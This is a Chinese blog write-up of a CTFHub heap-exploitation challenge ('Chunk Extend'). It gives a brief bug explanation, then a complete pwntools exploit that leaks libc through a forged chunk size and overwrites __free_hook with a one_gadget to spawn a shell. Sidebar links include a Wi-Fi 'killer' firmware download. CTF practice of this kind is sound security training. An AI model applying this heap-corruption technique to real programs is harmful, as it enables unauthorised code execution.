CTFHub技能树---pwn-Chunk Extend

最新推荐文章于 2024-04-24 22:56:49 发布
最新推荐文章于 2024-04-24 22:56:49 发布
阅读量256 收藏
点赞数
分类专栏: PWN 网络安全 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128917658
版权

漏洞点

在这里插入图片描述
add这里如果 index 0 ~ 9 都申请了的 chunk ,那么 i = 10 再退出 for 循环,但是还会接下去利用 ptr[10] = malloc(ptr[20]) 申请chunk,实现 index 0 的堆块溢出
也就是add 可以覆盖掉一个第一个 chunk 的 size
最后第11个chunk的size会变成非常大,编辑chunk0,就可以实现溢出

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./chunk_extend"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",30492)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

def add(size):
	ru(b"choice: ")
	sl(b"1")
	ru(b"size:")
	sl(str(size))

def free(idx):
	ru(b"choice: ")
	sl(b"2")
	ru(b"idx:")
	sl(str(idx))


def edit(idx,size,data):
	ru(b"choice: ")
	sl(b"3")
	ru(b"idx:")
	sl(str(idx))
	ru(b"size:")
	sl(str(size))
	ru(b"content:")
	s(data)


def show(idx):
	ru(b"choice: ")
	sl(b"4")
	ru(b"idx:")
	sl(str(idx))


add(0x10)
for i in range(1,11):
	add(0x80)

edit(0,0x100,p64(0)*3+p64(0x481))
free(1)
edit(0,0x100,b"a"*0x20)
show(0)
ru(b"a"*0x20)
main_arena = uu64(r(6))
edit(0,0x100,p64(0)*3+p64(0x91))
add(0x80)
libc_base = main_arena-96-0x10-libc.sym['__malloc_hook']
free_hook = libc_base+libc.sym['__free_hook']
gadget = [0x10a38c,0x4f322,0x4f2c5]
one_gadget = libc_base+gadget[1]
print("libc_base------------->: ",hex(libc_base))
print("free_hook------------>:  ",hex(free_hook))

free(2)
free(1)
edit(0,0x100,p64(0)*3+p64(0x91)+p64(free_hook))
add(0x80)
add(0x80)
edit(2,0x8,p64(one_gadget))

free(5)

itr()
saulgoodman-q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFhub pwn
清霂的博客
02-04 1196
这里写目录标题1.ret2text2.ret2shellcode 1.ret2text file checksec ida64 gets函数有栈溢出漏洞,题目为ret2text即返回到text段得到shell shift+f12打开字符串窗口,找到/bin/sh 点进去,选中/bin/sh,右键,交叉引用列表(可以找到使用/bin/sh的地方) 看到把/bin/sh放入rdi后,调用了system x64,64位系统中rdi,rsi,rdx,rcx,r8,r9作为调用函数的前6个参数,如果参数多于6
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CTFHub技能树-----pwn off by null
KaliLinux_V的博客
02-03 238
【代码】CTFHub技能树-----pwn off by null。
CTFHUB技能树——Pwn前置技能学习
最新发布
QX_XDE的博客
04-24 618
汇编指令讲解
CTFHUB-WriteUp】pwn技能树-栈溢出-Ret2VDSO
qq_39933891的博客
03-11 808
ops
CTFhub 技能树 PWN ret2text Python3 exp
break_cat的博客
11-17 1165
题目链接:https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text WP:https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html 搜exp的时候发现已经有人写过WP了,于是就Cirl+CV,发现原程序是用Python2写的,我的pwntools环境是Python3,因此程序需要稍作修改。 from pwn import * h
CTFHub[PWN技能树]——栈溢出
mcmuyanga的博客
12-19 2289
文章目录一、ret2text二、ret2shellcode 一、ret2text 例行检查,64位程序,没有开启任何保护 本地运行一下情况,看看大概的情况 64位ida载入,检索程序里的字符串发现了bin/sh 要满足条件才可以执行,但是我们可以直接跳转到0x4007B8去system(‘/bin/sh’) 看main函数 第8行,gets函数读入没有限制数据的长度,明显的溢出,溢出ret到执行system(‘/bin/sh’)的地址即可 from pwn import * #p=proc
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
ctf题库ctf-pwn赛题收集
03-31
此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。在比赛中,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,...
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
ctfhub pwn
m0_63253040的博客
09-09 264
被ida演了一波,gets不给参数,**********************给了system('/bin/sh')位置是0x4007B8。后来重新打开一遍就有了。
好好说话之Chunk Extend/Overlapping
hollk’s blog
09-04 4727
这是进入堆领域的第二个知识点,Chunk Extend/Overlapping。不知道正在看这篇文章的你有没有一些拓展的思想,在了解堆的基础知识后有没有自己想过在堆中可能存在问题的点。我们可能从做第一道pwn题开始就知道要溢出、要泄露、要拿flag、拿shell,在知道了这些技巧之后看到shell这道题就过去了,可能也没想过为什么会这样,往往这些我们不在乎的东西才是同比场景的方法和思路 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 5428
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
[Asuri_CTFHub] pwn for(canary泄露)Write up
yym68686
01-25 966
文件 for 这一题发现两个答案,canary偏移是47或39都可以。可能的原因是因为一个程序可以有很多个canary,canary是main函数的,所以是47,如果用choice2这个函数的canary就是39。 先看第一种情况偏移为47。 发现在函数choice2()中第九行printf(&s);表明存在格式化字符串漏洞。 用pwndbg确定printf地址,标记断点。 b printf 然后 run 输入 2 # 进入choice2()函数 1234 # printf的参数,随便
CTFHUB(PWN)Ret2Text
Rt1Text的博客
02-02 4247
64位没有开启任何保护的Ret2Text
2022catf1ag pwn-chunk
weixin_51480590的博客
12-10 213
2022catf1ag pwn-chunk wp
ctfhub 技能树pwn 栈溢出 ret2text
m0_75234353的博客
03-29 597
看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8。选中该行,看到下方的地址(4007B8)看到gets危险函数,再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入:wq 保存退出。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值